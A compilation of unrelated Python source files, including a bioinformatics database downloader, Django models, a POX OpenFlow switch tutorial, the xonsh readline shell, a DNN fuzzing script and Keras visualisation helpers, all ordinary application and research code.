print("PHROGs Database already downloaded") # download tarball and untar else: try: sp.call(["wget", filepath, "-P", db_dir]) except: sys.stderr.write("Error: PHROGs HMMer Database not found - link likely broken\n") return 0 # delete folder if it exists already if os.path.isfile(os.path.join(db_dir,folder)) == True: sp.call(["rm", os.path.join(db_dir,folder)]) # download untar -C for specifying the directory sp.call(["tar", "-xzf", os.path.join(db_dir, tarball), "-C", db_dir]) xebia-france/luigi-airflowlove_matcher/refactored/preprocessing/raw_set_processing.py1-10 class RawSetProcessing: """ This class aims to load and clean the dataset. """ def __init__(self, features): self.features = features # Select variables to process and include in the model @staticmethod def subset_features(features, df): sel_vars_df = df[features] return sel_vars_df @staticmethod # Remove ids with missing values def remove_ids_with_missing_values(df): sel_vars_filled_df = df.dropna() return sel_vars_filled_df @staticmethod def drop_duplicated_values(df): df = df.drop_duplicates() return df # Combine processing stages def combiner_pipeline(self, dataframe): raw_dataset = dataframe subset_df = self.subset_features(self.features,raw_dataset) subset_no_dup_df = self.drop_duplicated_values(subset_df) subset_filled_df = self.remove_ids_with_missing_values(subset_no_dup_df) return subset_filled_df 10-100 from machinable import Component class InheritedFlatness(Component): pass from django import forms from . models import HospitalM class HospitalM_Form(forms.ModelForm): class Meta: model = HospitalM fields = '__all__'from roglick.dungeon import features from roglick.engine.ecs import SystemBase from roglick.engine import event from roglick.events import ActionCompleteEvent,OpenDoorEvent,MapChangedEvent,MessageEvent class InteractionSystem(SystemBase): @event.event_handler(OpenDoorEvent) def open_door_handler(self, openevent): # Change the door Feature to an open door x, y = openevent.x, openevent.y self._world.current_map.tiles[x][y].add_feature(features.open_door) # Dispatch a new message event.dispatch(MessageEvent("You open the door")) # We've changed the map, signal that event.dispatch(MapChangedEvent()) # Now dispatch the ActionCompleteEvent; 1000 Fatigue to open a door event.dispatch(ActionCompleteEvent(openevent.entity, 1000)) import logging import hashlib import torch import torch.nn as nn from tqdm import tqdm from dataset import generate_test_dataset, load_dataset from generic_search import GenericSearcher from model import load_model from arguments import parser from utils import * conv_info = {} def load_select_info(opt): fpath = os.path.join(opt.output_dir, opt.dataset, opt.model, 'susp_filters.json') with open(fpath, 'r') as f: susp = json.load(f) return susp @torch.no_grad() def test( opt, model, testloader, device, susp, desc="Evaluate", tqdm_leave=True): model.eval() global conv_info nconv = [] correct, total = 0, 0 with tqdm(testloader, desc=desc, leave=tqdm_leave) as tepoch: for inputs, descs, targets in tepoch: conv_info.clear() inputs, targets = inputs.to(device), targets.to(device) outputs = model(inputs) total += targets.size(0) _, predicted = outputs.max(1) comp = predicted.eq(targets) correct += comp.sum().item() acc = 100. * correct / total tepoch.set_postfix(acc=acc) # logging the adversarial samples err_idx = (~comp).nonzero().flatten().tolist() for eid in err_idx: p = predicted[eid].item() t = targets[eid].item() if opt.politice == 'random': f = 'none' else: f = '' susp_l2chn = susp[str(t)] for lname, chns in susp_l2chn.items(): if len(chns) == 0: continue f += lname + ':' act_info, num_neu = conv_info[lname] for chn in chns: num_act = act_info[eid][chn].sum().item() ratio = num_act / num_neu if ratio > 0.5: f += str(chn) + ',' f = str(int(hashlib.sha1(f.encode('utf-8')).hexdigest(), 16) % (10 ** 8)) logging.info('%s | %s - %s', descs[eid], f'predict: {p}, target: {t}', f'cat: {f}') # statistic converage if opt.politice == 'random': continue for i, t in enumerate(targets): sum_act, sum_neu = 0, 0 if opt.politice == 'negconv': susp_l2chn = susp[str(t.item())] for lname, chns in susp_l2chn.items(): if len(chns) == 0: continue act_info, num_neu = conv_info[lname] sum_act += act_info[i][chns].sum().item() sum_neu += (len(chns) * num_neu) else: # neuconv for lname in conv_info.keys(): act_info, num_neu = conv_info[lname] sum_act += act_info[i].sum().item() sum_neu += (len(act_info[i]) * num_neu) conv = sum_act / sum_neu if sum_neu > 0 else 0 nconv.append(conv) if opt.politice == 'random': return None # mconv, _ = torch.tensor(nconv).view(opt.num_test, opt.popsize, -1).max(dim=-1) mconv = torch.tensor(nconv).view(opt.num_test, opt.popsize, -1) return mconv def _forward_conv(lname): def __hook(module, finput, foutput): global conv_info b, c, *_ = foutput.size() squeeze = foutput.view(b, c, -1) num_neu = squeeze.size(-1) actives = (squeeze > 0).sum(dim=-1).cpu() conv_info[lname] = (actives, num_neu) return __hook def main(): opt = parser.parse_args() print(opt) guard_options(opt) logging.basicConfig( format='%(asctime)s - %(message)s', filename=os.path.join( opt.output_dir, opt.dataset, opt.model, f'adversarial_samples_{opt.politice}_g{opt.gpu_id}.log' ), filemode='w', level=logging.INFO ) device = torch.device(opt.device if torch.cuda.is_available() else "cpu") model = load_model(opt).to(device) if opt.politice.endswith('conv'): for n, m in model.named_modules(): if isinstance(m, nn.Conv2d): m.register_forward_hook(_forward_conv(n)) susp = load_select_info(opt) else: susp = None testset = load_dataset(opt) opt.num_test = len(testset) gene = GenericSearcher(opt, num_test=opt.num_test) for e in range(opt.fuzz_epoch): print('fuzz epoch =', e) mutators = gene.generate_next_population() testloader = generate_test_dataset(opt, testset, mutators) mconv = test(opt, model, testloader, device, susp) gene.fitness(mconv) print('[info] Done.') if __name__ == "__main__": main() PartA_Hub/sw-part-a.py # Copyright 2012 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ This component is for use with the OpenFlow tutorial. It acts as a simple hub, but can be modified to act like an L2 learning switch. It's roughly similar to the one did for NOX. """ from pox.core import core import pox import pox.openflow.libopenflow_01 as of from pox.lib.packet.ethernet import ethernet, ETHER_BROADCAST from pox.lib.packet.ipv4 import ipv4 from pox.lib.packet.arp import arp import pox.lib.packet as pkt from pox.lib.addresses import IPAddr, EthAddr from pox.lib.util import str_to_bool, dpid_to_str from pox.lib.recoco import Timer log = core.getLogger() from pox.lib.revent import * import time import time # Timeout for flows FLOW_IDLE_TIMEOUT = 10 # Timeout for ARP entries ARP_TIMEOUT = 60 * 2 # Maximum number of packet to buffer on a switch for an unknown IP MAX_BUFFERED_PER_IP = 5 # Maximum time to hang on to a buffer for an unknown IP in seconds MAX_BUFFER_TIME = 5 class Entry (object): """ Not strictly an ARP entry. We use the port to determine which port to forward traffic out of. We use the MAC to answer ARP replies. We use the timeout so that if an entry is older than ARP_TIMEOUT, we flood the ARP request rather than try to answer it ourselves. """ def __init__ (self, port, mac): self.timeout = time.time() + ARP_TIMEOUT self.port = port self.mac = mac def __eq__ (self, other): if type(other) == tuple: return (self.port,self.mac)==other else: return (self.port,self.mac)==(other.port,other.mac) def __ne__ (self, other): return not self.__eq__(other) def isExpired (self): if self.port == of.OFPP_NONE: return False return time.time() > self.timeout def dpid_to_mac (dpid): return EthAddr("%012x" % (dpid & 0xffFFffFFffFF,)) class Tutorial (object): """ A Tutorial object is created for each switch that connects. A Connection object for that switch is passed to the __init__ function. """ def __init__ (self, connection): # Keep track of the connection to the switch so that we can # send it messages! self.connection = connection # This binds our PacketIn event listener connection.addListeners(self) # output action for sending packets to all ports out_action = of.ofp_action_output(port = of.OFPP_FLOOD) # Use this table to keep track of which ethernet address is on # which switch port (keys are MACs, values are ports). self.mac_to_port = {} # For each switch, we map IP addresses to Entries self.arpTable = {} self.lost_buffers = {} def _send_lost_buffers (self, dpid, ipaddr, macaddr, port): """ We may have "lost" buffers -- packets we got but didn't know where to send at the time. We may know now. Try and see. """ if (dpid,ipaddr) in self.lost_buffers: # Yup! bucket = self.lost_buffers[(dpid,ipaddr)] del self.lost_buffers[(dpid,ipaddr)] log.debug("Sending %i buffered packets to %s from %s" % (len(bucket),ipaddr,dpid_to_str(dpid))) for _,buffer_id,in_port in bucket: po = of.ofp_packet_out(buffer_id=buffer_id,in_port=in_port) po.actions.append(of.ofp_action_dl_addr.set_dst(macaddr)) po.actions.append(of.ofp_action_output(port = port)) core.openflow.sendToDPID(dpid, po) def resend_packet (self, packet_in, out_port): """ Instructs the switch to resend a packet that it had sent to us. "packet_in" is the ofp_packet_in object the switch had sent to the controller due to a table-miss. """ msg = of.ofp_packet_out() msg.data = packet_in # Add an action to send to the specified port action = of.ofp_action_output(port = out_port) msg.actions.append(action) # Send message to switch self.connection.send(msg) def act_like_hub (self, packet, packet_in): """ Implement hub-like behavior -- send all packets to all ports besides the input port. """ # We want to output to all ports -- we do that using the special # OFPP_ALL port as the output port. (We could have also used # OFPP_FLOOD.) self.resend_packet(packet_in, of.OFPP_ALL) # Note that if we didn't get a valid buffer_id, a slightly better # implementation would check that we got the full data before # sending it (len(packet_in.data) should be == packet_in.total_len)). def act_like_switch (self, packet, packet_in): """ Implement switch-like behavior. """ # Here's some psuedocode to start you off implementing a learning # switch. You'll need to rewrite it as real Python code. # Learn the port for the source MAC self.mac_to_port[packet.src] = packet_in.in_port #... if packet.dst in self.mac_to_port: # Send packet out the associated port #self.resend_packet(packet_in, self.mac_to_port[packet.dst]) #''' # Once you have the above working, try pushing a flow entry # instead of resending the packet (comment out the above and # uncomment and complete the below.) log.debug("Installing this flow...") # Maybe the log statement should have source/destination/port? #log.debug("Installing %s -> %s.%i" %(packet.src, packet.dst, dst_port)) #msg = of.ofp_flow_mod() # ## Set fields to match received packet msg = of.ofp_flow_mod() #msg.idle_timeout = 10 #msg.hard_timeout = 30 msg.buffer_id = packet_in.buffer_id msg.match = of.ofp_match.from_packet(packet) #msg.match.dl_type = 0x806 #msg.tp_src = None #msg.tp_dst = None #msg.nw_tos = None msg.match.dl_src = packet.src msg.match.dl_dst = packet.dst msg.actions.append(of.ofp_action_output(port = self.mac_to_port[packet.dst])) #print msg self.connection.send(msg) # #< Set other fields of flow_mod (timeouts? buffer_id?) > # #< Add an output action, and send -- similar to resend_packet() > #''' else: # Flood the packet out everything but the input port # This part looks familiar, right? log.debug("Installing else flow...") self.resend_packet(packet_in, of.OFPP_ALL) def _handle_PacketIn (self, event): """ #Handles packet in messages from the switch. """ packet = event.parsed # This is the parsed packet data. if not packet.parsed: log.warning("Ignoring incomplete packet") return packet_in = event.ofp # The actual ofp_packet_in message. # Comment out the following line and uncomment the one after # when starting the exercise. #self.act_like_hub(packet, packet_in) self.act_like_switch(packet, packet_in) def launch (): """ Starts the component """ def start_switch (event): log.debug("Controlling %s" % (event.connection,)) Tutorial(event.connection) core.openflow.addListenerByName("ConnectionUp", start_switch) # Generated by Django 3.2.6 on 2021-08-05 05:18 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('streetsignup', '0012_street_city_site'), ('pages', '0007_menupage_icon'), ] operations = [ migrations.AddField( model_name='homepage', name='city', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='streetsignup.city'), preserve_default=False, ), ] from datetime import datetime from pytz import country_timezones, timezone from pytz.exceptions import UnknownTimeZoneError import pycountry from SmsScheduler.logger import logger, log_exception class Country(object): """ This class defines Country and methods for getting country code, time zone, and current time in country """ def __init__(self, country): self.country = country def get_country_code(self): """ Returns the country code :param self: Instance of Country :return: Country code :rtype: str """ try: return pycountry.countries.get(name=self.country).alpha_2 except (KeyError, AttributeError) as e: logger.error(e) logger.error(log_exception()) def get_time_zone(self): """ Returns the timezone of the country :param self: Instance of Country :return: timezone :rtype: str """ try: timezone_country = {} country_code = self.get_country_code() for countrycode in country_timezones: timezones = country_timezones[countrycode] for tz in timezones: timezone_country[countrycode] = tz return timezone_country[country_code] except (KeyError, ValueError, AttributeError, TypeError) as e: logger.error(e) logger.error(log_exception()) def get_current_time(self): """ Returns the current time in specific country :param self: Instance of Country :return: current_time :rtype: datetime.datetime """ try: tz = self.get_time_zone() now = datetime.now(timezone(tz)) except (AttributeError, UnknownTimeZoneError) as e: logger.error(e) logger.error(log_exception()) return now class CountryDelay(Country): """ Manages delay on the basic od schedule time and selected country """ def __init__(self, country, schedule_time): try: super().__init__(country) self.schedule_time = schedule_time except (AttributeError, TypeError) as e: logger.error(e) logger.error(log_exception()) def get_delay(self): """ Returns the time in delivery of message, based on country and schedule time :param self: Instance of CountryDelay :return: time remaining in sending message (seconds) :rtype: int """ try: time_now = self.get_current_time().timestamp() schedule_time = datetime.strptime(self.schedule_time, "%Y-%m-%d %I:%M %p").timestamp() return int(schedule_time-time_now) except ValueError as e: logger.error(e) logger.error(log_exception()) andreycizov/python-xrpcxrpc_tests/examples/test_exemplary.py0 from time import sleep from xrpc.client import client_transport from xrpc.error import HorizonPassedError from xrpc.examples.exemplary_rpc import ExemplaryRPC from xrpc.popen import wait_all from xrpc_tests.mp.abstract import ProcessHelperCase, server_main def exemplary_main(addr): return ExemplaryRPC, ExemplaryRPC() class TestExemplary(ProcessHelperCase): def test_exemplary(self): addr_a = 'udp://127.0.0.1:7483' addr_b = 'udp://' ax = self.ps.popen(server_main, exemplary_main, addr_a) with client_transport(ExemplaryRPC, dest=addr_a, origin=addr_b) as r: while True: try: a = r.move_something(5, 6, 8, pop='asd') b = r.reply(5, 6, 8, pop='asd') c = r.exit() break except HorizonPassedError: sleep(0) self.assertEqual(wait_all(ax, max_wait=5), [0]) xonsh/readline_shell.py # -*- coding: utf-8 -*- """The readline based xonsh shell. Portions of this code related to initializing the readline library are included from the IPython project. The IPython project is: * Copyright (c) 2008-2014, IPython Development Team * Copyright (c) 2001-2007, <> * Copyright (c) 2001, <> * Copyright (c) 2001, <> """ import os import sys import cmd import time import select import builtins import importlib import threading import collections from xonsh.lazyjson import LazyJSON from xonsh.lazyasd import LazyObject from xonsh.base_shell import BaseShell from xonsh.ansi_colors import ansi_partial_color_format, ansi_color_style_names, ansi_color_style from xonsh.prompt.base import partial_format_prompt, multiline_prompt from xonsh.tools import print_exception from xonsh.platform import ON_WINDOWS, ON_CYGWIN, ON_DARWIN from xonsh.lazyimps import pygments, pyghooks terminal256 = LazyObject( lambda: importlib.import_module('pygments.formatters.terminal256'), globals(), 'terminal') readline = None RL_COMPLETION_SUPPRESS_APPEND = RL_LIB = RL_STATE = None RL_CAN_RESIZE = False RL_DONE = None RL_VARIABLE_VALUE = None _RL_STATE_DONE = 0x1000000 _RL_STATE_ISEARCH = 0x0000080 _RL_PREV_CASE_SENSITIVE_COMPLETIONS = 'to-be-set' def setup_readline(): """Sets up the readline module and completion suppression, if available.""" global RL_COMPLETION_SUPPRESS_APPEND, RL_LIB, RL_CAN_RESIZE, RL_STATE, readline if RL_COMPLETION_SUPPRESS_APPEND is not None: return for _rlmod_name in ('gnureadline', 'readline'): try: readline = importlib.import_module(_rlmod_name) sys.modules['readline'] = readline except ImportError: pass else: break if readline is None: print("""Skipping setup. Because no `readline` implementation available. Please install a backend (`readline`, `prompt-toolkit`, etc) to use `xonsh` interactively. See https://github.com/xonsh/xonsh/issues/1170""") return import ctypes import ctypes.util uses_libedit = readline.__doc__ and 'libedit' in readline.__doc__ readline.set_completer_delims(' \t\n') # Cygwin seems to hang indefinitely when querying the readline lib if (not ON_CYGWIN) and (not readline.__file__.endswith('.py')): RL_LIB = lib = ctypes.cdll.LoadLibrary(readline.__file__) try: RL_COMPLETION_SUPPRESS_APPEND = ctypes.c_int.in_dll( lib, 'rl_completion_suppress_append') except ValueError: # not all versions of readline have this symbol, ie Macs sometimes RL_COMPLETION_SUPPRESS_APPEND = None try: RL_STATE = ctypes.c_int.in_dll(lib, 'rl_readline_state') except Exception: pass RL_CAN_RESIZE = hasattr(lib, 'rl_reset_screen_size') env = builtins.__xonsh_env__ # reads in history readline.set_history_length(-1) ReadlineHistoryAdder() # sets up IPython-like history matching with up and down readline.parse_and_bind('"\e[B": history-search-forward') readline.parse_and_bind('"\e[A": history-search-backward') # Setup Shift-Tab to indent readline.parse_and_bind('"\e[Z": "{0}"'.format(env.get('INDENT'))) # handle tab completion differences found in libedit readline compatibility # as discussed at http://stackoverflow.com/a/7116997 if uses_libedit and ON_DARWIN: readline.parse_and_bind("bind ^I rl_complete") print('\n'.join(['', "*" * 78, "libedit detected - readline will not be well behaved, including but not limited to:", " * crashes on tab completion", " * incorrect history navigation", " * corrupting long-lines", " * failure to wrap or indent lines properly", "", "It is highly recommended that you install gnureadline, which is installable with:", " pip install gnureadline", "*" * 78]), file=sys.stderr) else: readline.parse_and_bind("tab: complete") # try to load custom user settings inputrc_name = os.environ.get('INPUTRC') if inputrc_name is None: if uses_libedit: inputrc_name = '.editrc' else: inputrc_name = '.inputrc' inputrc_name = os.path.join(os.path.expanduser('~'), inputrc_name) if (not ON_WINDOWS) and (not os.path.isfile(inputrc_name)): inputrc_name = '/etc/inputrc' if os.path.isfile(inputrc_name): try: readline.read_init_file(inputrc_name) except Exception: # this seems to fail with libedit print_exception('xonsh: could not load readline default init file.') def teardown_readline(): """Tears down up the readline module, if available.""" try: import readline except (ImportError, TypeError): return def _rebind_case_sensitive_completions(): # handle case sensitive, see Github issue #1342 for details global _RL_PREV_CASE_SENSITIVE_COMPLETIONS env = builtins.__xonsh_env__ case_sensitive = env.get('CASE_SENSITIVE_COMPLETIONS') if case_sensitive is _RL_PREV_CASE_SENSITIVE_COMPLETIONS: return if case_sensitive: readline.parse_and_bind("set completion-ignore-case off") else: readline.parse_and_bind("set completion-ignore-case on") _RL_PREV_CASE_SENSITIVE_COMPLETIONS = case_sensitive def fix_readline_state_after_ctrl_c(): """ Fix to allow Ctrl-C to exit reverse-i-search. Based on code from: http://bugs.python.org/file39467/raw_input__workaround_demo.py """ if ON_WINDOWS: # hack to make pyreadline mimic the desired behavior try: _q = readline.rl.mode.process_keyevent_queue if len(_q) > 1: _q.pop() except Exception: pass if RL_STATE is None: return if RL_STATE.value & _RL_STATE_ISEARCH: RL_STATE.value &= ~_RL_STATE_ISEARCH if not RL_STATE.value & _RL_STATE_DONE: RL_STATE.value |= _RL_STATE_DONE def rl_completion_suppress_append(val=1): """Sets the rl_completion_suppress_append varaiable, if possible. A value of 1 (default) means to suppress, a value of 0 means to enable. """ if RL_COMPLETION_SUPPRESS_APPEND is None: return RL_COMPLETION_SUPPRESS_APPEND.value = val def rl_variable_dumper(readable=True): """Dumps the currently set readline variables. If readable is True, then this output may be used in an inputrc file. """ RL_LIB.rl_variable_dumper(int(readable)) def rl_variable_value(variable): """Returns the currently set value for a readline configuration variable.""" global RL_VARIABLE_VALUE if RL_VARIABLE_VALUE is None: import ctypes RL_VARIABLE_VALUE = RL_LIB.rl_variable_value RL_VARIABLE_VALUE.restype = ctypes.c_char_p env = builtins.__xonsh_env__ enc, errors = env.get('XONSH_ENCODING'), env.get('XONSH_ENCODING_ERRORS') if isinstance(variable, str): variable = variable.encode(encoding=enc, errors=errors) rtn = RL_VARIABLE_VALUE(variable) return rtn.decode(encoding=enc, errors=errors) def _insert_text_func(s, readline): """Creates a function to insert text via readline.""" def inserter(): readline.insert_text(s) readline.redisplay() return inserter DEDENT_TOKENS = LazyObject(lambda: frozenset(['raise', 'return', 'pass', 'break', 'continue']), globals(), 'DEDENT_TOKENS') class ReadlineShell(BaseShell, cmd.Cmd): """The readline based xonsh shell.""" def __init__(self, completekey='tab', stdin=None, stdout=None, **kwargs): super().__init__(completekey=completekey, stdin=stdin, stdout=stdout, **kwargs) setup_readline() self._current_indent = '' self._current_prompt = '' self._force_hide = None self.cmdqueue = collections.deque() def __del__(self): teardown_readline() def singleline(self, store_in_history=True, **kwargs): """Reads a single line of input. The store_in_history kwarg flags whether the input should be stored in readline's in-memory history. """ if not store_in_history: # store current position to remove it later try: import readline except ImportError: store_in_history = True pos = readline.get_current_history_length() - 1 rtn = input(self.prompt) if not store_in_history and pos >= 0: readline.remove_history_item(pos) return rtn def parseline(self, line): """Overridden to no-op.""" return '', line, line def completedefault(self, text, line, begidx, endidx): """Implements tab-completion for text.""" rl_completion_suppress_append() # this needs to be called each time _rebind_case_sensitive_completions() line = builtins.aliases.expand_alias(line) mline = line.partition(' ')[2] offs = len(mline) - len(text) if self.completer is None: x = [] else: x = [(i[offs:] if " " in i[:-1] else i) for i in self.completer.complete(text, line, begidx, endidx, ctx=self.ctx)[0]] return x # tab complete on first index too completenames = completedefault def _load_remaining_input_into_queue(self): buf = b'' while True: r, w, x = select.select([self.stdin], [], [], 1e-6) if len(r) == 0: break buf += os.read(self.stdin.fileno(), 1024) if len(buf) > 0: buf = buf.decode().replace('\r\n', '\n').replace('\r', '\n') self.cmdqueue.extend(buf.splitlines(keepends=True)) def postcmd(self, stop, line): """Called just before execution of line. For readline, this handles the automatic indentation of code blocks. """ try: import readline except ImportError: return stop if self.need_more_lines: if len(line.strip()) == 0: readline.set_pre_input_hook(None) self._current_indent = '' elif line.rstrip()[-1] == ':': ind = line[:len(line) - len(line.lstrip())] ind += builtins.__xonsh_env__.get('INDENT') readline.set_pre_input_hook(_insert_text_func(ind, readline)) self._current_indent = ind elif line.split(maxsplit=1)[0] in DEDENT_TOKENS: env = builtins.__xonsh_env__ ind = self._current_indent[:-len(env.get('INDENT'))] readline.set_pre_input_hook(_insert_text_func(ind, readline)) self._current_indent = ind else: ind = line[:len(line) - len(line.lstrip())] if ind != self._current_indent: insert_func = _insert_text_func(ind, readline) readline.set_pre_input_hook(insert_func) self._current_indent = ind else: readline.set_pre_input_hook(None) return stop def _cmdloop(self, intro=None): """Repeatedly issue a prompt, accept input, parse an initial prefix off the received input, and dispatch to action methods, passing them the remainder of the line as argument. This was forked from Lib/cmd.py from the Python standard library v3.4.3, (C) Python Software Foundation, 2015. """ self.preloop() if self.use_rawinput and self.completekey: try: import readline self.old_completer = readline.get_completer() readline.set_completer(self.complete) readline.parse_and_bind(self.completekey + ": complete") have_readline = True except ImportError: have_readline = False try: if intro is not None: self.intro = intro if self.intro: self.stdout.write(str(self.intro) + "\n") stop = None while not stop: line = None exec_now = False if len(self.cmdqueue) > 0: line = self.cmdqueue.popleft() exec_now = line.endswith('\n') if self.use_rawinput and not exec_now: inserter = None if line is None \ else _insert_text_func(line, readline) if inserter is not None: readline.set_pre_input_hook(inserter) try: line = self.singleline() except EOFError: if builtins.__xonsh_env__.get("IGNOREEOF"): self.stdout.write('Use "exit" to leave the shell.' '\n') line = '' else: line = 'EOF' if inserter is not None: readline.set_pre_input_hook(None) else: self.print_color(self.prompt, file=self.stdout) if line is not None: os.write(self.stdin.fileno(), line.encode()) if not exec_now: line = self.stdin.readline() if len(line) == 0: line = 'EOF' else: line = line.rstrip('\r\n') if have_readline and line != 'EOF': readline.add_history(line) if not ON_WINDOWS: # select() is not fully functional on windows self._load_remaining_input_into_queue() line = self.precmd(line) stop = self.onecmd(line) stop = self.postcmd(stop, line) self.postloop() finally: if self.use_rawinput and self.completekey: try: import readline readline.set_completer(self.old_completer) except ImportError: pass def cmdloop(self, intro=None): while not builtins.__xonsh_exit__: try: self._cmdloop(intro=intro) except KeyboardInterrupt: print() # Gives a newline fix_readline_state_after_ctrl_c() self.reset_buffer() intro = None @property def prompt(self): """Obtains the current prompt string.""" global RL_LIB, RL_CAN_RESIZE if RL_CAN_RESIZE: # This is needed to support some system where line-wrapping doesn't # work. This is a bug in upstream Python, or possibly readline. RL_LIB.rl_reset_screen_size() if self.need_more_lines: if self.mlprompt is None: try: self.mlprompt = multiline_prompt(curr=self._current_prompt) except Exception: # pylint: disable=broad-except print_exception() self.mlprompt = ' ' return self.mlprompt env = builtins.__xonsh_env__ # pylint: disable=no-member p = env.get('PROMPT') try: p = partial_format_prompt(p) except Exception: # pylint: disable=broad-except print_exception() hide = True if self._force_hide is None else self._force_hide p = ansi_partial_color_format(p, style=env.get('XONSH_COLOR_STYLE'), hide=hide) self._current_prompt = p self.settitle() return p def format_color(self, string, hide=False, **kwargs): """Readline implementation of color formatting. This usesg ANSI color codes. """ hide = hide if self._force_hide is None else self._force_hide return ansi_partial_color_format(string, hide=hide, style=builtins.__xonsh_env__.get('XONSH_COLOR_STYLE')) def print_color(self, string, hide=False, **kwargs): if isinstance(string, str): s = self.format_color(string, hide=hide) else: # assume this is a list of (Token, str) tuples and format it env = builtins.__xonsh_env__ self.styler.style_name = env.get('XONSH_COLOR_STYLE') style_proxy = pyghooks.xonsh_style_proxy(self.styler) formatter = terminal256.Terminal256Formatter(style=style_proxy) s = pygments.format(string, formatter).rstrip() print(s, **kwargs) def color_style_names(self): """Returns an iterable of all available style names.""" return ansi_color_style_names() def color_style(self): """Returns the current color map.""" style = style = builtins.__xonsh_env__.get('XONSH_COLOR_STYLE') return ansi_color_style(style=style) class ReadlineHistoryAdder(threading.Thread): def __init__(self, wait_for_gc=True, *args, **kwargs): """Thread responsible for adding inputs from history to the current readline instance. May wait for the history garbage collector to finish. """ super(ReadlineHistoryAdder, self).__init__(*args, **kwargs) self.daemon = True self.wait_for_gc = wait_for_gc self.start() def run(self): try: import readline except ImportError: return hist = builtins.__xonsh_history__ while self.wait_for_gc and hist.gc.is_alive(): time.sleep(0.011) # gc sleeps for 0.01 secs, sleep a beat longer files = hist.gc.files() i = 1 for _, _, f in files: try: lj = LazyJSON(f, reopen=False) for command in lj['cmds']: inp = command['inp'].splitlines() for line in inp: if line == 'EOF': continue readline.add_history(line) if RL_LIB is not None: RL_LIB.history_set_pos(i) i += 1 lj.close() except (IOError, OSError, ValueError): continue seisatsu/DennisMUD-ESP32 ##################### # # # list_entrances.py # # Copyright 2020 # # # ##################### # ********** # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # ********** NAME = "list entrances" CATEGORIES = ["exits", "rooms"] USAGE = "list entrances [room_id]" DESCRIPTION = """List the entrances leading to a room. If a room ID is provided as an optional argument, list the entrances to that room. Otherwise, list the entrances to the room you are currently in. You must be an owner of the room to list its entrances. Wizards can list the entrances to any room. Ex. `list entrances` to list the entrances to the current room. Ex. `list entrances 5` to list the entrances to the room with ID 5.""" def COMMAND(console, args): # Perform initial checks. if not COMMON.check(NAME, console, args, argmax=1): return False # Select the given room or the current room. if len(args) == 1: # Perform argument type checks and casts. roomid = COMMON.check_argtypes(NAME, console, args, checks=[[0, int]], retargs=0) if roomid is None: return False else: roomid = console.user["room"] # Lookup the target room and perform room checks. targetroom = COMMON.check_room(NAME, console, roomid, owner=True) if not targetroom: return False # Are there any entrances? if not targetroom["entrances"]: console.msg("{0}: This room has no entrances.".format(NAME)) return True # Scan the entrance source rooms listed for this room. entcount = 0 for ent in sorted(targetroom["entrances"]): # Lookup the entrance source room and perform room checks. srcroom = COMMON.check_room(NAME, console, ent, reason=False) if not srcroom: console.log.error("Entrance source room does not exist for target room: {srcroom} -> {targetroom}", srcroom=ent, targetroom=roomid) console.msg("{0}: ERROR: Entrance room does not exist: {0}".format(NAME, ent)) continue # Enumerate the exits in the entrance source room. exits = [] for ex in enumerate(srcroom["exits"]): if ex[1]["dest"] == targetroom["id"]: exits.append(ex) # Format the entrance source room name and ID. body = "{0} ({1}) :: ".format(srcroom["name"], srcroom["id"]) # Format the names and IDs of the exits in the entrance source room that lead to this room. for ex in exits: body += "{0} ({1}), ".format(ex[1]["name"], ex[0]) # Trim extra ', ' from the end of the line and send it. body = body[:-2] console.msg(body) # Keep count. entcount += 1 # Finished if not entcount: console.msg("{0}: This room has no entrances.".format(NAME)) else: console.msg("{0}: Total entrances: {1}".format(NAME, entcount)) return True 0 import matplotlib.pyplot as plt import matplotlib.image as mpimg from math import sqrt, ceil import numpy as np import random from tensorflow.keras.preprocessing.image import img_to_array, load_img import tensorflow as tf from getdata import get_data, get_random_items import os def print_images(images, title, img_titles = None): ncols = ceil(sqrt(len(images))) nrows = ceil(len(images) / ncols) fig = plt.gcf() fig.canvas.set_window_title(title) # fig.set_size_inches(ncols * 4, nrows * 4) for i, img_path in enumerate(images): # set up subplot sp = plt.subplot(nrows, ncols, i + 1 ) if img_titles: sp.set_title(img_titles[i]) sp.axis('Off') img = mpimg.imread(img_path) plt.imshow(img) plt.show() def print_intermediate_representations(images, model): successive_outputs = [layer.output for layer in model.layers[1:]] visualization_model = tf.keras.models.Model( inputs=model.input, outputs=successive_outputs ) img_path = random.choice(images) img = load_img(img_path, target_size=(300, 300)) x = img_to_array(img) x = x.reshape((1,) + x.shape) x /= 255 successive_feature_maps = visualization_model.predict(x) layer_names = [layer.name for layer in model.layers] for layer_name, feature_map in zip(layer_names, successive_feature_maps): # do this for conv/maxpool layers but not the fully-connected layers if len(feature_map.shape) == 4: n_features = feature_map.shape[-1] # number of features in feature map #the feature map has shape (1, size, size, n_features) size = feature_map.shape[1] display_grid = np.zeros((size, size * n_features)) for i in range(n_features): x = feature_map[0, :, :, i] x -= x.mean() x *= 64 x += 128 x = np.clip(x, 0, 255).astype('uint8') display_grid[:, i*size:(i+1) * size] = x scale = 20.0 / n_features plt.figure(figsize=(scale * n_features, scale)) plt.title(layer_name) plt.grid(False) plt.imshow(display_grid) plt.show() def show_dataset_examples(show: bool, number_of_images = 10): if not show: return horse_dir, human_dir, horse_dir_validation, 